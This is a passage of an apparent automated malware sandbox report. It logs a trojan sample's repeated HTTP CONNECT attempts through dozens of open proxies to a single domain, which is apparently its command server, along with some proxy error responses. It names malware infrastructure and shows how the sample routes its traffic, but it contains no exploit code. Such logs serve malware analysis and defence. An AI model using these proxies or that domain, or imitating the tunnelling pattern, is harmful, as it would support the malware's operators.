                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.195388079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:58.194700003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:10.194724083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:22.194704056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1365192.168.2.852032104.238.111.107360495828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.098509073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.694813967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.195120096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.195116043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.991883993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.789242983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.695195913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.195333004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:52.101092100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1366192.168.2.85347337.139.26.5431285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.129147053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.152543068 CET39INHTTP/1.0 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1367192.168.2.853579104.200.135.4641455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.136573076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1368192.168.2.853919185.40.80.14341535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.139060020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1369192.168.2.854217130.162.213.17531295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.139322042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.315515041 CET1286INHTTP/1.1 500 Internal Server Error
                                                                                Server: squid/6.2-VCS
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:34 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 1112
                                                                                X-Squid-Error: ERR_CANNOT_FORWARD 0
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 45 52 52 5f 43 41 4e 4e 4f 54 5f 46 4f 52 57 41 52 44 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 3e 45 52 52 4f 52 3c 2f 68 31 3e 0a 3c 68 32 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 32 3e 0a 3c 2f 64 69 76 3e 0a 3c 68 72 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 54 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 72 65 74 72 69 65 76 65 20 74 68 65 20 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 0a 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 3c 70 3e 3c 62 3e 53 68 69 65 6c 64 20 69 73 20 75 6e 61 62 6c 65 20 74 6f 20 66 6f 72 77 61 72 64 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 63 6f 6e 66 69 67 75 72 65 64 20 75 70 73 74 72 65 61 6d 2e 2e 3c 2f 62 3e 3c 2f 70 3e 0a 3c 2f 62 6c 6f 63 6b 71 75 6f 74 65 3e 0a 0a 3c 70 20 69 64 3d 22 73 79 73 6d 73 67 22 3e 54 68 65 20 73 79 73 74 65 6d 20 72 65 74 75 72 6e 65 64 3a 20 3c 69 3e 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 69 3e 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 68 72 3e 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 3e 47 65 6e 65 72 61 74 65 64 20 46 72 69 2c 20 32 33 20 46 65 62 20 32 30 32 34 20 31 33 3a 32 38 3a 33 34 20 47 4d 54 20 62 79 20 45 72 69 63 6f 6d 20 28 65 73 2d 70 72 6f 78 79 2d 61 75 74 68 29 3c 2f 70 3e 0a 3c 21 2d 2d 20 45 52 52
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id=ERR_CANNOT_FORWARD><div id="titles"><h1>ERROR</h1><h2>The requested URL could not be retrieved</h2></div><hr><div id="content"><p>The following error was encountered while trying to retrieve the URL: <a href="https://heygirlisheeverythingyouwantedinaman.com/*">https://heygirlisheeverythingyouwantedinaman.com/*</a></p><blockquote id="error"><p><b>Shield is unable to forward your request to the configured upstream..</b></p></blockquote><p id="sysmsg">The system returned: <i>Please try again later.</i></p><br></div><hr><div id="footer"><p>Generated Fri, 23 Feb 2024 13:28:34 GMT by Ericom (es-proxy-auth)</p>... ERR


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1370192.168.2.853848177.93.59.429995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.139982939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.179406881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.959500074 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1371192.168.2.853426138.117.116.30440095828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.141102076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1372192.168.2.85335882.208.111.19805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.141238928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.192276001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.251616001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.337481022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1373192.168.2.853472173.212.237.43612115828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.178210020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.192251921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.251607895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.337455988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:58.347948074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1374192.168.2.85421893.117.72.27557705828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.179092884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1375192.168.2.85421020.24.43.21481235828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.181101084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.513700008 CET319INHTTP/1.1 403 Forbidden
                                                                                Server: squid
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:34 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 17
                                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                X-Cache: MISS from cdn-fintech.info
                                                                                X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                Connection: keep-alive
                                                                                Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                Data Ascii: ERR_ACCESS_DENIED


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1376192.168.2.85335765.20.216.24980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.191184998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1377192.168.2.85396547.206.214.4543215828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.202378988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1378192.168.2.85421945.11.95.16560085828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.202883005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1379192.168.2.854220159.65.77.16885855828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.203082085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1380192.168.2.853766143.244.131.231285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.203085899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.382286072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.398423910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.492127895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:58.507253885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1381192.168.2.853739159.223.45.19280805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.254611969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.382452011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.398421049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.492131948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:58.507282019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:10.522901058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:22.522892952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1382192.168.2.853895208.109.14.49460475828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.264941931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.382440090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.398426056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.492130995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:58.507301092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:10.522907972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:22.523056984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1383192.168.2.85404251.38.63.124272945828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.265238047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.288713932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.382639885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.382826090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1384192.168.2.854223132.148.130.90238365828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.265244007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.695012093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.195120096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.195086956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1385192.168.2.8542161.15.62.1256785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.265315056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1386192.168.2.853972185.104.112.62805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.273061037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.288710117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.382668972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.394985914 CET824INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:42 GMT
                                                                                Server: Apache/2.4.56 (Debian)
                                                                                Content-Length: 632
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
